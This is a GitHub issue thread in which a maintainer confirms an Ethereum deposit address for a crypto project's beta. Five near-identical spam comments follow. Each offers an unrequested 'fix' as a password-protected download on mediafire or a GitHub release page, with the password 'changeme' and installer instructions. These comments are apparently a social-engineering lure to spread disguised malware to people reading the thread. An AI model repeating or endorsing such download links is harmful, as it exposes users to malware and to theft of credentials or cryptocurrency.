### ISSUE TITLE
Deposit Address For Signals Beta

### ISSUE THREAD

**Issue by gaia** [coinfi/coinfi#477]
please confirm the Deposit Address For Signals Beta is
0xa61B5f29730C7b111C8e0B1e78bD3737d2Bb8684

**Comment by hanchang** [comment]
@gaia Confirmed!

This address is also codified here:
https://github.com/coinfi/coinfi/blob/develop/app/javascript/App/bundles/signalsPage/SignalReservationForm.tsx#L362

Etherscan URL for convenience:
https://etherscan.io/address/0xa61b5f29730c7b111c8e0b1e78bd3737d2bb8684

Looking forward to seeing you on the other side!

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
